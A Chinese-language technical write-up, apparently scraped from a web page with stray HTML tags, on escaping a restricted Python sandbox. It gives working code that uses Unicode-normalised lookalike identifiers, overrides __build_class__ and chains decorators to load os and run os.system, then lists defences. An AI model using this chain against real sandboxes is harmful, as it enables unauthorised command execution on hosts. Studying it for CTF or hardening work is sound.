Python沙箱逃逸技术：利用装饰器和Unicode规范化绕过限制<\/h1>

1. 沙箱环境分析<\/h2>

1.1 沙箱限制条件<\/h3>
过滤了括号 (<\/code>，阻止函数调用<\/li>
过滤了特定字母：h<\/code>, u<\/code>, i<\/code>, "<\/code>, \<\/code>, '<\/code><\/li>
置空了 __builtins__<\/code><\/li>
<\/ul>
1.2 主要挑战<\/h3>

无法通过常规方式调用函数（缺少括号）<\/li>
无法直接使用包含被过滤字母的关键字（如__builtins__<\/code>）<\/li>
<\/ul>
2. 核心技术原理<\/h2>
2.1 装饰器特性利用<\/h3>
Python装饰器是一种在函数\/类定义时立即执行的语法结构，无需显式调用（不需要括号）。<\/p>
装饰器示例：<\/p>
def<\/span> p<\/span>(f):
<\/span><\/span>    print("执行装饰器"<\/span>)
<\/span><\/span>    return<\/span> f
<\/span><\/span>
<\/span><\/span>@p<\/span>
<\/span><\/span>def<\/span> hi<\/span>():
<\/span><\/span>    pass<\/span>
<\/span><\/span># 输出"执行装饰器"，无需调用hi()<\/span>
<\/span><\/span><\/code><\/pre>2.2 Unicode规范化(NFKC)<\/h3>
Python 3解释器会对变量名进行NFKC规范化处理：<\/p>

组合字符统一：é<\/code> (U+00E9) 和 e´<\/code> (U+0065 + U+0301) 被视为相同<\/li>
兼容字符转换：

全角字母 Ａ<\/code> (U+FF21) → A<\/code> (U+0041)<\/li>
带圈数字 ①<\/code> (U+2460) → 1<\/code> (U+0031)<\/li>
罗马数字 Ⅳ<\/code> (U+2163) → IV<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
3. 完整攻击流程<\/h2>
3.1 获取基础组件<\/h3>
b =<\/span> [].<\/span>__class__.<\/span>__base__  # 获取object基类<\/span>
<\/span><\/span>d =<\/span> [].<\/span>__doc__  # 获取list类的文档字符串作为字符库<\/span>
<\/span><\/span>n =<\/span> ...<\/span>  # 构造下划线和"__build_class__"字符串<\/span>
<\/span><\/span><\/code><\/pre>3.2 劫持类创建机制<\/h3>
__b𝑢𝕚𝕚𝕚lt𝕚𝕚𝕚ns__[n] =<\/span> lambda<\/span> *<\/span>_: b
<\/span><\/span><\/code><\/pre>
覆盖__build_class__<\/code>函数<\/li>
使所有类定义都返回object<\/code>基类<\/li>
<\/ul>
3.3 装饰器调用链<\/h3>
第一环：获取所有子类<\/h4>
@b<\/span>.<\/span>__class__.<\/span>__s𝑢bclasses__
<\/span><\/span>class<\/span> s<\/span>: _
<\/span><\/span><\/code><\/pre>
等价于 s = type.__subclasses__(object)<\/code><\/li>
获取当前环境中所有加载的类<\/li>
<\/ul>
第二环：加载os模块<\/h4>
@s<\/span>[84<\/span>].<\/span>load_mod𝑢le
<\/span><\/span>@lambda<\/span> _: d[32<\/span>] +<\/span> d[17<\/span>]
<\/span><\/span>class<\/span> o<\/span>: _
<\/span><\/span><\/code><\/pre>
内层装饰器构造"os"字符串<\/li>
外层装饰器使用_frozen_importlib.BuiltinImporter<\/code>加载模块<\/li>
等价于 o = s[84].load_module('os')<\/code><\/li>
<\/ol>
第三环：执行系统命令<\/h4>
@o<\/span>.<\/span>system
<\/span><\/span>@lambda<\/span> _: d[2<\/span>] +<\/span> d[139<\/span>]
<\/span><\/span>class<\/span> _<\/span>: _
<\/span><\/span><\/code><\/pre>
内层装饰器构造命令字符串（如"id"）<\/li>
外层装饰器调用os.system<\/code><\/li>
等价于 _ = os.system('id')<\/code><\/li>
<\/ol>
4. 关键技术点<\/h2>
4.1 装饰器链工作原理<\/h3>

最内层装饰器先执行，生成参数<\/li>
外层装饰器使用内层结果作为参数<\/li>
通过多层嵌套实现函数调用链<\/li>
<\/ol>
4.2 Unicode绕过技巧<\/h3>

使用视觉等效字符绕过字母过滤：

s𝑢bclasses<\/code> → subclasses<\/code> (通过NFKC规范化)<\/li>
b𝑢𝕚𝕚𝕚lt𝕚𝕚𝕚ns<\/code> → builtins<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
4.3 字符串构造方法<\/h3>

从现有对象（如[].__doc__<\/code>）中切片提取所需字符<\/li>
拼接出被过滤的关键字（如"os"、"system"）<\/li>
<\/ul>
5. 防御建议<\/h2>


加强字符过滤：<\/p>

检查Unicode变体字符<\/li>
规范化后再次检查<\/li>
<\/ul>
<\/li>

限制装饰器使用：<\/p>

监控或限制装饰器语法<\/li>
<\/ul>
<\/li>

加固沙箱环境：<\/p>

限制对关键内置属性（如__build_class__<\/code>）的修改<\/li>
使用更严格的模块导入控制<\/li>
<\/ul>
<\/li>

实施深度防御：<\/p>

结合多种过滤和监控机制<\/li>
限制系统命令执行能力<\/li>
<\/ul>
<\/li>
<\/ol>